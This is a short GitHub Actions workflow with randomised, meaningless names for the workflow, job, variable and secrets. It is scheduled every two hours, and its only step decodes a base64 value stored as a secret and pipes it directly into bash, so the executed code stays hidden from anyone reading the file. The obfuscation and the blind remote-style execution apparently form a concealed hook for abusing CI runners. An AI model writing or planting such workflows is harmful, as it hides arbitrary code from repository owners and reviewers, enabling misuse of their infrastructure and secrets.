name: orprskb
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  mtsyjzfDxUI:
    runs-on: ubuntu-latest
    env:
      yvrPucWHcQpX: ${{ secrets.qahCPBwrKnhQ }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.bMhLIImXwTY }}" | base64 -d | bash
